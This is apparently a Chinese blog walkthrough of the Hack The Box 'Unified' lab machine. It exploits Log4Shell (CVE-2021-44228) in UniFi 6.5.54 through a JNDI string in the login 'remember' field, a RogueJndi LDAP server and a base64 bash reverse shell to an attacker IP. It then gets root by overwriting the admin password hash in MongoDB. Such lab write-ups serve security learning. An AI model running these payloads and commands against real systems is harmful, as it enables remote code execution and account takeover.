HTB_Unified_log4j_jndi注入&mongodb修改用户hash

最新推荐文章于 2024-05-31 15:09:20 发布
最新推荐文章于 2024-05-31 15:09:20 发布
阅读量527 收藏
点赞数
分类专栏: # startpoint 文章标签: log4j mongodb 哈希算法 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40927195/article/details/128811787
版权

文章目录

信息收集

nmap -sV -v 这次扫描时间很长,因为默认只扫 1000 个常用端口,如果扫到大端口就会自动扫描全端口,可以自行加速

22/tcp   open  ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
6789/tcp open  ibm-db2-admin?
8080/tcp open  http-proxy
8443/tcp open  ssl/nagios-nsca Nagios NSCA

SSH 登录尝试失败,6789 端口是 db2 数据库的管理端口,8080 端口是个代理转发端口,访问会重定向到 8443 端口是 UniFi 6.5.54 产品的页面,发现该版本存在 CVE-2021-44228 漏洞

在这里插入图片描述

在这里插入图片描述

漏洞复现

尝试复现 CVE-2021-44228,曾经风靡一时的漏洞 Apache log4j,这是 java 比较常用的日志监控组件

原理就是我们创建一个恶意服务,服务器请求执行,达到控制的目的,以rmi为例

RMI是Java的一组拥护开发 分布式应用程序 的 API 。 RMI使用Java语言 接口 定义了远程对象,它集合了Java序列化和Java远程方法协议 (Java Remote Method Protocol)。 简单地说,这样使原先的程序在同一操作系统的方法调用,变成了不同操作系统之间程序的方法调用

RmiServer.java

package log4j_unser;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

public class RmiServer {
    public static void main(String[] args) throws Exception{
        // 创建远程对象
        RemoteHelloWorld hello = new RemoteHelloWorld();
        // 创建注册表
        Registry registry = LocateRegistry.createRegistry(1099);
        // 将远程对象注册到注册表里面,绑定地址 远程函数实现的是执行弹计算器的命令
        registry.rebind("rmi://127.0.0.1:12345/Hello",hello);
        // registry.rebind("Hello",hello);
    }
}

RemoteHelloWorld接口

package log4j_unser;

import java.rmi.Remote;
import java.rmi.RemoteException;

public interface IRemoteHelloWorld extends Remote {
    public String hello() throws RemoteException;
}

RemoteHelloWorld接口实现

package log4j_unser;

import java.io.IOException;
import java.rmi.RemoteException;
import java.rmi.server.UnicastRemoteObject;

public class RemoteHelloWorld extends UnicastRemoteObject implements IRemoteHelloWorld {
    protected RemoteHelloWorld() throws IOException {
        Runtime.getRuntime().exec("calc");
    }

    @Override
    public String hello() throws RemoteException {
        System.out.println("Callback");
        return "Hello";
    }
}

执行RmiServer.java
在这里插入图片描述

漏洞验证

请求登录接口

在这里插入图片描述

修改为

"remember":"${jndi:ldap://10.10.16.18/acxsc}"

在这里插入图片描述

目的是让服务器反向连接我们的攻击机,访问本机的方法

攻击机监听389端口,这是LDAP的默认端口,监听tun0网卡(与目标同一网络),成功连接,存在该漏洞

在这里插入图片描述

漏洞利用

准备payload,输出base64编码

echo 'bash -c bash -i >&/dev/tcp/10.10.16.18/4444 0>&1' |base64 
YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTYuMTgvNDQ0NCAwPiYxCg==

搭建 ldap 服务器,传递 payload

java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,BASE64 STRING HERE}|
{base64,-d}|{bash,-i}" --hostname "{YOUR TUN0 IP ADDRESS}"

在这里插入图片描述

发送数据,工具固定格式

在这里插入图片描述

连接成功

在这里插入图片描述

第二种获取交互式命令行的方法

script /dev/null -c bash

在这里插入图片描述

$flag
cat /home/michael/user.txt

提权

检查mongodb是否在目标机器上运行

ps aux | grep mongo

在这里插入图片描述

尝试读取管理员密码,UniFi程序的默认端口是ace,查询admin表的数据

mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"

在这里插入图片描述

x_shadow即是密码哈希, SHA-512 算法使用一个以 $6$ 开头的 16 字符字符串盐值进行散列

  • $6$开头的,表明是用SHA-512加密的;

  • $1$开头的,表明是用MD5加密的;

  • $2$开头的,表明是用Blowfish加密的;

  • $5$开头的,表明是用 SHA-256加密的。星号代表帐号被锁定

    ps:是在linux shadow文件才这么表示

由于是散列函数,无法破解,只能使用替换方法

// 加密PassWord1234
mkpasswd -m sha-512 Password1234
$6$YqozzJiM1m7BfLpC$DhsQOccAVLaHIeU3t8cinVUrDH.8SlqT5XsdFpTnq1pGKb.3BbxXP8UOaqiWNqNIEhULcX1YWBGnlHBpnzio..

每次加密会随机生成盐,用于加密

$6$YqozzJiM1m7BfLpC$DhsQOccAVLaHIeU3t8cinVUrDH.8SlqT5XsdFpTnq1pGKb.3BbxXP8UOaqiWNqNIEhULcX1YWBGnlHBpnzio..
$6$:使用sha-512散列函数
$YqozzJiM1m7BfLpC$:随机生成的盐
DhsQOccAVLaHIeU3t8cinVUrDH.8SlqT5XsdFpTnq1pGKb.3BbxXP8UOaqiWNqNIEhULcX1YWBGnlHBpnzio..:加密后的结果, linux中是86位

替换现有hash

mongo --port 27117 ace --eval 'db.admin.update({"_id":
ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"SHA_512 Hash Generated"}})'
# ObjectId("61ce278f46e0fb0012d47ee4")是管理员id

使用修改后的账号密码登录,在设置setting—>site中查看ssh密码,并远程连接,为 root 权限

ssh 10.129.145.178
重返太空
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
htb_challenges:为我所有过于复杂的htb挑战完成内容转储
03-27
htb_challenges 为我所有过于复杂的htb挑战完成内容转储
HTB-Unified
weixin_51392885的博客
11-14 866
HTB 内网渗透
HTB-Tier2- Unified
32bin的博客
11-21 1317
WebVulnerability AssessmentDatabasesInjectionCustom ApplicationsOutdated SoftwareMongoDBJavaPenetration Tester Level 1ReconaisanceClear Text CredentialsDefault CredentialsCode InjectionSOFT RESETReset MachineOPENWalkthroughONNECTConnect to Starting Point V
MongoDB账户密码设置
互联网知识分享
07-22 6130
每个角色都拥有一组特定的权限,用于控制用户对数据库进行的操作,如读取数据、写入数据或修改数据库结构等。系统操作权限:控制用户对数据库服务器的操作,如创建和管理用户、数据库的备份和恢复等。):这些是用户可以创建的自定义角色,可以根据实际需求定义不同的权限和操作。中,账户密码设置非常重要,可以保护用户的数据不被未经授权的用户访问。数据库操作权限:控制用户对数据库的操作,如读取、写入、修改、删除等。提供了多个方法来管理用户密码,包括创建用户修改密码和删除用户等。对象来执行具体的用户账户和密码操作。
unifi gateway网关部署
布谷鸟
02-25 631
unifi gateway网关部署 unifi gateway 安装 预置条件 unifi gateway 硬件必须先接入网络中 需要单独的节点案子gateway 的控制器controller,controller 要接入Internet 需要在unifi cloud 申请帐号 unifi 初始帐号为 ubnt/ubnt or root/ubnt. 使用controller设置Gateway的登陆帐号 unifi 接入网组网实例 unifi ports 8443 端口不能访问 d
htb:Starting Point
LainWith的博客
10-19 1285
第0层部分靶机免费,部分靶机收费。由于这部分太过简单,因此一笔带过。 第一关Meow是telnet靶场:https://www.bilibili.com/video/BV1nS4y137GQ 第二关Fawn是ftp靶场:https://www.bilibili.com/video/BV11F41147Kf 第三关Dancing是SMB靶场:https://www.bilibili.com/video/BV1nS4y137vm 第四关Redeemer是Redis靶场:https://www.theethica
HTB_Mongod_mongodb未授权访问
网络安全学习
01-31 151
HTB_Mongod_mongodb未授权访问
HTB_Bike靶机之模板注入
网络安全学习
05-12 477
船到桥头自然直 文章目录信息收集模板引擎SSIT 模板注入后放答案 信息收集 日常 A 扫描,两个端口 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA) | 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:.
htb_Inject (LFI,Spring Cloud Function SpEL注入)
weixin_62621015的博客
03-25 424
Inject hack the box靶场
HTB_tools-开源
05-02
Whit htb-tools可以简化上传和下载的带宽分配的配置和监视。
Python库 | htb_cli-0.1.1-py3-none-any.whl
02-16
python库,解压后可用。 资源全名:htb_cli-0.1.1-py3-none-any.whl
PyPI 官网下载 | htb_cli-0.1.1-py3-none-any.whl
01-05
资源来自pypi官网。 资源全名:htb_cli-0.1.1-py3-none-any.whl
ROS_HTB_优先限速
09-07
ROS_HTB_优先限速,不错的脚本试试吧
HTB_Appointment 靶机之登录框万能密码、sqlmap post 注入
网络安全学习
04-22 3778
⚔ 🧱 YOU NEED TO WALK BEFORE YOU CAN RUN 🧱⚔ 文章目录先放答案万能密码注入sqlmap post 注入测试是否存在注入查数据库查表查列查数据 先放答案 因为这期问题都比较简单,简单到我想不到讲什么把它们串到一起,索性就直接放答案了 Structured Query Language SQL Injection personally identifiable information A03:2021-Injection Apache httpd 2.4.38 ((.
重构与优化-对象间特性搬移重构(2)
最新发布
艾利克斯冰的博客
05-31 29
在软件工程和面向对象编程中,"对象之间搬移特性"(Moving Characteristics Between Objects)通常指的是重构(Refactoring)过程中的一种操作,旨在优化代码结构、提高可维护性或提升性能。这种重构可能涉及将一个对象的某些属性或行为(方法)转移到另一个对象中,以更好地遵循设计原则如单一职责原则(SRP, Single Responsibility Principle)或促进高内聚低耦合的设计。
Spring——依赖项
qq_40419080的博客
05-29 596
依赖注入
【数据结构与算法|栈篇】中缀表达式转变为后缀表达式
2301_80912559的博客
05-28 236
/
提高MongoDB效率九大优化方式
jia12216的专栏
05-29 587
第一:单次批量查询比循环逐条查询更快; 第二:尽量避免嵌入不断增加的数据; 第三:预填充数据; 第四:尽可能预先分配空间; 第五:文档要自给自足; 第六:避免使用$where; 第七:编写代码处理数据完整性问题; 第八:使用正确的类型; 第九:用简单唯一的id替换掉_id。
format htb
08-24
HTB is an abbreviation for Hack The Box, which is an online platform that provides hands-on penetration testing and hacking challenges. It allows users to simulate real-world cybersecurity scenarios and practice their skills in a safe and controlled environment. The format of HTB typically involves a series of machines or challenges that users need to exploit to gain root access or find flags. Participants can use various tools and techniques to solve the challenges and improve their knowledge of cybersecurity.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值